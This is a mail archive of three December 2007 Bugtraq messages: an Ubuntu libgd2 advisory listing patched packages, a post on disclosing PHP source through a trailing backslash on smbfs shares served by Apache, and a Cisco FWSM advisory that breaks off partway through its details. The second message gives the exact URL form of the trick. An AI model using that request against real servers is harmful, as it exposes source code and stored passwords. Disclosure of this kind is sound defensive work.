==========================================================Ubuntu Security Notice USN-557-1 December 18, 2007
libgd2 vulnerability
CVE-2007-3996
==========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
libgd2-noxpm 2.0.33-2ubuntu5.3
libgd2-xpm 2.0.33-2ubuntu5.3
Ubuntu 6.10:
libgd2-noxpm 2.0.33-4ubuntu2.2
libgd2-xpm 2.0.33-4ubuntu2.2
Ubuntu 7.04:
libgd2-noxpm 2.0.34~rc1-2ubuntu1.2
libgd2-xpm 2.0.34~rc1-2ubuntu1.2
Ubuntu 7.10:
libgd2-noxpm 2.0.34-1ubuntu1.1
libgd2-xpm 2.0.34-1ubuntu1.1
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
Mattias Bengtsson and Philip Olausson discovered that the GD
library did not properly perform bounds checking when creating
images. An attacker could send specially crafted input to
applications linked against libgd2 and cause a denial of service
or possibly execute arbitrary code.
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.33-2ubuntu5.3.diff.gz
Size/MD5: 256388 c22bf0e9a4ceb934a72c1e629f3f7345
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.33-2ubuntu5.3.dsc
Size/MD5: 965 9844d5761c012e9cd85f8e01982ca4f1
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.33.orig.tar.gz
Size/MD5: 587617 be0a6d326cd8567e736fbc75df0a5c45
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-dev_2.0.33-2ubuntu5.3_all.deb
Size/MD5: 129578 0fad2d315680833cdbb38fea33aa37ad
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd2_2.0.33-2ubuntu5.3_all.deb
Size/MD5: 129556 f1c9b871778b1cf9761402d8c13eb05c
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-2ubuntu5.3_amd64.deb
Size/MD5: 341284 1bd8a4460cd838d6c4f717a7ddb8b30d
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.33-2ubuntu5.3_amd64.deb
Size/MD5: 200102 d61525246d100ba84587cad0cfc2cac7
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.33-2ubuntu5.3_amd64.deb
Size/MD5: 343008 9f7ed5f38f6e2f698301086c44032ac2
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.33-2ubuntu5.3_amd64.deb
Size/MD5: 201848 a8033ac32c5afe588e88ed657358a4bf
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.33-2ubuntu5.3_amd64.deb
Size/MD5: 143018 9eb2814c4d0a0239a84acad80f3a53f0
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-2ubuntu5.3_i386.deb
Size/MD5: 330832 e03c9c146530fb6d42dcad3e418b5d93
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.33-2ubuntu5.3_i386.deb
Size/MD5: 193102 3d522618e285740f38a1a38c7e9d1745
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.33-2ubuntu5.3_i386.deb
Size/MD5: 331586 0b411365e82869de8a97dc78dfc7dbfb
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.33-2ubuntu5.3_i386.deb
Size/MD5: 194784 572ba523021dce7c64a23b872d2e0bb0
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.33-2ubuntu5.3_i386.deb
Size/MD5: 141992 de6d710d6d92ead0dafa95f7b759e2a2
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-2ubuntu5.3_powerpc.deb
Size/MD5: 342198 b9653f4f1648b809dc38b889b0feba19
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.33-2ubuntu5.3_powerpc.deb
Size/MD5: 200148 0c77b8ca13df52da7c66526f7066f07f
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.33-2ubuntu5.3_powerpc.deb
Size/MD5: 344104 66016821ce2337133045047153541735
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.33-2ubuntu5.3_powerpc.deb
Size/MD5: 201790 33022dce1adae741f17cf8f9288330e1
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.33-2ubuntu5.3_powerpc.deb
Size/MD5: 151200 94237c599ebbbd15f71e62dd37ec3506
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-2ubuntu5.3_sparc.deb
Size/MD5: 333964 12057bd1b9e700ae20484b15ffe0bdb8
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.33-2ubuntu5.3_sparc.deb
Size/MD5: 194384 e4259893315e6c39f26c5cc40b357623
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.33-2ubuntu5.3_sparc.deb
Size/MD5: 335258 ee9577b5226b9d6ed850eb644e3f1510
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.33-2ubuntu5.3_sparc.deb
Size/MD5: 196234 4084ace898b64f160bef383ca1478e3d
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.33-2ubuntu5.3_sparc.deb
Size/MD5: 142272 b8f737172e99cbe5174a7b302282899e
Updated packages for Ubuntu 6.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.33-4ubuntu2.2.diff.gz
Size/MD5: 264613 5d80340a9dc9adc0aabaca7fd95fcaec
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.33-4ubuntu2.2.dsc
Size/MD5: 955 fc3030ffb14ef6cdc7795376067eff4f
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.33.orig.tar.gz
Size/MD5: 587617 be0a6d326cd8567e736fbc75df0a5c45
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-4ubuntu2.2_amd64.deb
Size/MD5: 343902 400c8c7cac4f4b739728ed9f4db3e3cc
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.33-4ubuntu2.2_amd64.deb
Size/MD5: 202360 b88e6f242589b2426e0e9ebd020869a9
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.33-4ubuntu2.2_amd64.deb
Size/MD5: 345584 361bac28164063415f90df76e413829b
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.33-4ubuntu2.2_amd64.deb
Size/MD5: 204032 fd87e4aedf43fd333c3a24cc4a02dc34
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.33-4ubuntu2.2_amd64.deb
Size/MD5: 145312 e886c7abbc83a34901c3da440b942384
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-4ubuntu2.2_i386.deb
Size/MD5: 334194 0c5fc7bf868491ece0930887885ab232
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.33-4ubuntu2.2_i386.deb
Size/MD5: 197904 e704c542be3116b82880d2f636c23b83
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.33-4ubuntu2.2_i386.deb
Size/MD5: 335796 059de1263e9dfe0d68ad20713937cfcf
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.33-4ubuntu2.2_i386.deb
Size/MD5: 199564 808a9e740ef98185544ce76f9999a47a
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.33-4ubuntu2.2_i386.deb
Size/MD5: 144038 fc4e2c6c58fff65ca589a89cfe7b29b6
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-4ubuntu2.2_powerpc.deb
Size/MD5: 345082 f0c5ae4083be2746a79c2ecf75633c25
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.33-4ubuntu2.2_powerpc.deb
Size/MD5: 202642 7c7db18ef6764b03c67443f27a5eb7cd
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.33-4ubuntu2.2_powerpc.deb
Size/MD5: 346994 402d5816eff366b73bb92bb245390cd1
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.33-4ubuntu2.2_powerpc.deb
Size/MD5: 203956 e36759b6569397571b9051fa2f918ab3
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.33-4ubuntu2.2_powerpc.deb
Size/MD5: 153136 07d5ce125617705eed8e05165cde66c1
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.33-4ubuntu2.2_sparc.deb
Size/MD5: 336732 6cde25bc64e454d8a31af13d3369ab18
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.33-4ubuntu2.2_sparc.deb
Size/MD5: 197356 3bc789036bbd12a9903a981e01d7bd9a
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.33-4ubuntu2.2_sparc.deb
Size/MD5: 338994 dfbb05be56e1ae70e0c5cd65ce34294d
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.33-4ubuntu2.2_sparc.deb
Size/MD5: 199154 80396f3d9d97c50e0338e8b40be0c80c
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.33-4ubuntu2.2_sparc.deb
Size/MD5: 144414 9adf1a374e4caf8f8403cf81ff982fd3
Updated packages for Ubuntu 7.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.34~rc1-2ubuntu1.2.diff.gz
Size/MD5: 21382 03ac4d91e4fe46fcb16460a90c7942ef
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.34~rc1-2ubuntu1.2.dsc
Size/MD5: 916 2f6481dd8b241c8bf88d97d8189b6e08
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.34~rc1.orig.tar.gz
Size/MD5: 1261537 bfaf9bb0ebee54560b311e739e531c01
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.34~rc1-2ubuntu1.2_amd64.deb
Size/MD5: 347520 21bdaa7175d8394fd7cef3be7350c0c0
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.34~rc1-2ubuntu1.2_amd64.deb
Size/MD5: 206754 719326bc17188e87b05d18556a3be9c0
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.34~rc1-2ubuntu1.2_amd64.deb
Size/MD5: 349876 c99c7515b42db73a4f54d76680471a16
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.34~rc1-2ubuntu1.2_amd64.deb
Size/MD5: 209092 e41db7e1fa76df1293adc1e3d1a2c512
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.34~rc1-2ubuntu1.2_amd64.deb
Size/MD5: 147296 f38012a727117e6792e8a28a53aea84c
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.34~rc1-2ubuntu1.2_i386.deb
Size/MD5: 337332 024bcd2589d3bead2ae9ecee9efbbd7b
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.34~rc1-2ubuntu1.2_i386.deb
Size/MD5: 202740 48b1e4e5a8593354804c9d59ce62f90a
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.34~rc1-2ubuntu1.2_i386.deb
Size/MD5: 340320 82964693eb87f76591addc33389ccedd
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.34~rc1-2ubuntu1.2_i386.deb
Size/MD5: 204706 c9dbf1e71a7af0f2896374abfbadecbc
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.34~rc1-2ubuntu1.2_i386.deb
Size/MD5: 146048 0586240224716a1d4c44aae129a8d80d
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.34~rc1-2ubuntu1.2_powerpc.deb
Size/MD5: 348376 2f89e0d9e5ffd9a9ca293bff357e6472
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.34~rc1-2ubuntu1.2_powerpc.deb
Size/MD5: 210100 d8b1843242ed0dc948f942fb33587797
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.34~rc1-2ubuntu1.2_powerpc.deb
Size/MD5: 350714 0815fd076bf7cbe7dbb851f13d051443
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.34~rc1-2ubuntu1.2_powerpc.deb
Size/MD5: 211678 5061bf89c83c546616a5cb6df5f2aa5a
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.34~rc1-2ubuntu1.2_powerpc.deb
Size/MD5: 157990 c7cb16be01ed1f7079f7fa98948f43ee
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.34~rc1-2ubuntu1.2_sparc.deb
Size/MD5: 339864 aa66569c84e6051fe1cc7efb100a0c2e
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.34~rc1-2ubuntu1.2_sparc.deb
Size/MD5: 202000 93c468277ef317213da68338d7e86156
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.34~rc1-2ubuntu1.2_sparc.deb
Size/MD5: 343164 64708248bded14a7e0a6756c72736998
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.34~rc1-2ubuntu1.2_sparc.deb
Size/MD5: 204348 e9d0f0b6ff6ba14b85b24f53f5305e20
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.34~rc1-2ubuntu1.2_sparc.deb
Size/MD5: 146990 b043b68c152c67708a11df8380f820cc
Updated packages for Ubuntu 7.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.34-1ubuntu1.1.diff.gz
Size/MD5: 21551 d622a9da37a5421671c066f4e672a3b5
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.34-1ubuntu1.1.dsc
Size/MD5: 908 f761cd853bbecd5e7572018c6a2ef44a
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2_2.0.34.orig.tar.gz
Size/MD5: 1273059 3a02dde42be92a5112fe23b41f54432b
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.34-1ubuntu1.1_amd64.deb
Size/MD5: 462242 0ed64fa7e71bfd51452a1c83b19960e7
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.34-1ubuntu1.1_amd64.deb
Size/MD5: 320832 8ae45174b7640e006f23e0dc26302320
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.34-1ubuntu1.1_amd64.deb
Size/MD5: 464556 dd81056c2381cb6978a6790384f30f67
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.34-1ubuntu1.1_amd64.deb
Size/MD5: 323272 23061e2b84469639f58ec3d14fa7841f
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.34-1ubuntu1.1_amd64.deb
Size/MD5: 263082 98fbb18b06adbf503e24bed17063c142
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.34-1ubuntu1.1_i386.deb
Size/MD5: 453316 39219dee5295b7c35f3f1220377de1ad
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.34-1ubuntu1.1_i386.deb
Size/MD5: 316960 2e32162ce1b4869d27494e0aa51a8986
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.34-1ubuntu1.1_i386.deb
Size/MD5: 455492 d86749fd831465d92090ffa721f4b6b8
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.34-1ubuntu1.1_i386.deb
Size/MD5: 319126 d4a2159b60a843475daf437a916f66a4
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.34-1ubuntu1.1_i386.deb
Size/MD5: 262066 69cc458441d0876c20e7754429fa3eeb
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.34-1ubuntu1.1_powerpc.deb
Size/MD5: 462796 16a31668613ad6860e07b213a0a66b50
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.34-1ubuntu1.1_powerpc.deb
Size/MD5: 324200 8f8a9dfb8a3b5b7010bd58dbab7bc3f8
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.34-1ubuntu1.1_powerpc.deb
Size/MD5: 465292 ef797c071ae514acfa96d282e58c2b73
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.34-1ubuntu1.1_powerpc.deb
Size/MD5: 326358 517e6bc2970a6adfde9723b61000ef74
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.34-1ubuntu1.1_powerpc.deb
Size/MD5: 272662 e93ca2ad03086714e4e8576c7de9ec32
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm-dev_2.0.34-1ubuntu1.1_sparc.deb
Size/MD5: 455938 79160c45a8f129d4dcf16e2f2bfaa931
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-noxpm_2.0.34-1ubuntu1.1_sparc.deb
Size/MD5: 316790 b48c18ca31f837885fd9f3d0f1e42eee
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm-dev_2.0.34-1ubuntu1.1_sparc.deb
Size/MD5: 458376 3824bd749654f493ca6cce151ad32f95
http://security.ubuntu.com/ubuntu/pool/main/libg/libgd2/libgd2-xpm_2.0.34-1ubuntu1.1_sparc.deb
Size/MD5: 318946 a1c2d44d7c64c3731eae143541ffaf61
http://security.ubuntu.com/ubuntu/pool/universe/libg/libgd2/libgd-tools_2.0.34-1ubuntu1.1_sparc.deb
Size/MD5: 262806 1e0df9da38cabf862ecd81582f232ade
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla -
http://enigmail.mozdev.org
iD8DBQFHaHUKW0JvuRdL8BoRAqtXAJsGep/QeDb4X+VkcLHlNiWVSAHXKACgoRi0
QqZ45/koPoNniPUILyfqbTo=4iEs
-----END PGP SIGNATURE-----
From - Wed Dec 19 11:20:35 2007
X-Account-Key: account7
X-UIDL: 4648aa8300004df2
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-35026-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 166AB5CC01F
for <lists@securityspace.com>; Wed, 19 Dec 2007 11:17:23 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Wed, 19 Dec 2007 08:00:44 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id D47AA143A9E; Wed, 19 Dec 2007 07:35:11 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11181 invoked from network); 19 Dec 2007 09:27:40 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=gmail.com; s=gamma;
h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
bh=grihkV8kWmrAmB+ToQdSsfdHJqRJfr+8E+EjizbdFlw=;
b=VgdRsbhAbU5xL6MnpYMwmhi8ZVZz5oTBTImS1GZZmo/O04RLrNHRro4KBOeesDHs1L0Dt4R3uENrtffDyyCCTSjQXF4uzyOa3aq7DmRJukWWZifD4duC5GJWYOy+f5kQ9m0kRMLhLNtU88Sk1T3McIZXMJsc39p+CDsF5jR9P/0DomainKey-Signature: a=rsa-sha1; c=nofws;
d=gmail.com; s=gamma;
h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
b=WeMevyNlm5FPOybPUMFMm731hykYlel/DwnCzGsGJy0DL7rKGCSLf2EvIj5YGQaQ1NzMQxjvmc6YsVzRP6lmOYe4/e/RVayqroL77MPd9ocvQUZ4vx5zvD83tqmxZPDOU/XUhNndla+LV7kfnb45dK7aHkIHSv84FVnm+LEZ+QAMessage-ID: <4debaa770712190214p11cef6d3r94c250ae6ada61e5@mail.gmail.com>
Date: Wed, 19 Dec 2007 11:14:50 +0100
From: "=?ISO-8859-2?Q?Maciej_G�siorowski?=" <gonsiore@gmail.com>
To: bugtraq <bugtraq@securityfocus.com>
Subject: smbfs and apache+php source code disclosure
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Status:
Because of different filename handling in Posix and Windows there is
an issue with resolving filenames with a backslash "\" character
appended on a windows share.
Consider you have a windows share mounted on a linux box with a php
script on it - let's say info.php.
Executing find info.php and find info.php\\ results with the same file
- info.php (same with cat info.php\\).
When using this share to serve PHP scripts with apache (from a linux
box) you can use it to display php script content directly to your
browser.
In apache, scripts are mapped to engines using the AddType directive
with file extension specified. Text files with extensions not handled
by any AddType are considered as plain text.
When visiting
http://linuxbox/winshare/info.php - you get you script executed.
When visiting
http://linuxbox/winshare/info.php\ or
http://linuxbox/winshare/info.php%5C - you get your script content
displayed, revealing any details like database passwords etc.
The reason is obvious, smbfs finds file info.php\, but apache doesn't
have the extension php\ mapped to php engine.
The same should apply to perl scripts with mod_perl.
I don't know if this is something new, maybe it is some configuration
mistake. I have just confirmed it on a freshly installed debian etch
box with all security updates applied using default settings of apache
and smbfs.
Regards
Maciej
From - Wed Dec 19 11:40:35 2007
X-Account-Key: account7
X-UIDL: 4648aa8300004df3
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-35028-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 7E6155CC031
for <lists@securityspace.com>; Wed, 19 Dec 2007 11:31:18 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Wed, 19 Dec 2007 08:27:26 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 77137237054; Wed, 19 Dec 2007 09:02:38 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20223 invoked from network); 19 Dec 2007 15:37:05 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Application Inspection Vulnerability in Cisco Firewall Services Module
Date: Wed, 19 Dec 2007 15:20:00 -0000
Message-id: <20071219.fwsm@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report:
Content-Return: Prohibited
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Application Inspection Vulnerability in Cisco
Firewall Services Module
Advisory ID: cisco-sa-20071219-fwsm
===========
Revision 1.0
===========
Last Updated 2007 December 19 1600 UTC (GMT)
For Public Release 2007 December 19 1600 UTC (GMT)
Summary
======
A vulnerability exists in the Cisco Firewall Services Module (FWSM)
- - - a high-speed, integrated firewall module for Cisco Catalyst 6500
switches and Cisco 7600 Series routers, that may result in a reload
of the FWSM. The only affected FWSM System Software Version is
3.2(3).
There are no known instances of intentional exploitation of this
issue. However, Cisco has observed data streams that appear to be
unintentionally triggering this vulnerability.
Common Vulnerabilities and Exposures (CVE) identifier CVE-2007-5584
has been assigned to this vulnerability.
Cisco will release free software updates that address this
vulnerability.
A workaround that mitigates this vulnerability is available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20071219-fwsm.shtml
Affected Products
================
Vulnerable Products
+------------------
The FWSM is vulnerable if running System Software version 3.2(3).
To determine if the FWSM is vulnerable, issue the "show module"
command-line interface (CLI) command from Cisco IOS or Cisco CatOS
to identify what modules and sub-modules are installed in the
system.
The following example shows a system with a Firewall Service Module
(WS-SVC-FWM-1) installed in slot 4.
switch#show module
Mod Ports Card Type Model Serial No.
--- ----- -------------------------------------- ----------------- -----------
1 48 SFM-capable 48 port 10/100/1000mb RJ45 WS-X6548-GE-TX SAxxxxxxxxx
4 6 Firewall Module WS-SVC-FWM-1 SAxxxxxxxxx
5 2 Supervisor Engine 720 (Active) WS-SUP720-BASE SAxxxxxxxxx
6 2 Supervisor Engine 720 (Hot) WS-SUP720-BASE SAxxxxxxxxx
After locating the correct slot, issue the show module <slot number>
command to identify the software version that is running.
switch#show module 4
Mod Ports Card Type Model Serial No.
--- ----- -------------------------------------- ----------------- -----------
4 6 Firewall Module WS-SVC-FWM-1 SAxxxxxxxxx
Mod MAC addresses Hw Fw Sw Status
--- --------------------------------- ------ ------------ ------------ -------
4 0003.e4xx.xxxx to 0003.e4xx.xxxx 3.0 7.2(1) 3.2(3) Ok
The preceding example shows that the FWSM is running version 3.2(3)
as indicated by the column under "Sw" above.
Note: Recent versions of Cisco IOS will show the software version of
each module in the output from the show module command; therefore,
executing the show module <slot number> command is not necessary.
Alternatively, the information can also be obtained directly from the
FWSM through the show version command as seen in the following
example.
FWSM#show version
FWSM Firewall Version 3.2(3)
Customers who use the Cisco Adaptive Security Device Manager (ASDM)
to manage their devices can find the version of the software displayed
in the table in the login window or in the upper left corner of the
ASDM window. The version notation is similar to the following example.
FWSM Version: 3.2(3)
Products Confirmed Not Vulnerable
+--------------------------------
* FWSM System Software versions 3.2(2) and earlier.
* FWSM System Software versions 3.1(x).
* FWSM System Software versions 1.x(y) and 2.x(y).
* The Cisco PIX 500 Series Security Appliance (PIX)
* The Cisco 5500 Series Adaptive Security Appliance (ASA).
No other Cisco products are currently known to be affected by this
vulnerability.
Details
======
A vulnerability exists in the processing of data in the
control-plane path with Layer 7 Application Inspections, that may
result in a reload of the FWSM. The vulnerability can be triggered
with standard network traffic, which is passed through the
Application Layer Protocol Inspection process.
The only FWSM release affected by this vulnerability is FWSM System
Software version 3.2(3).
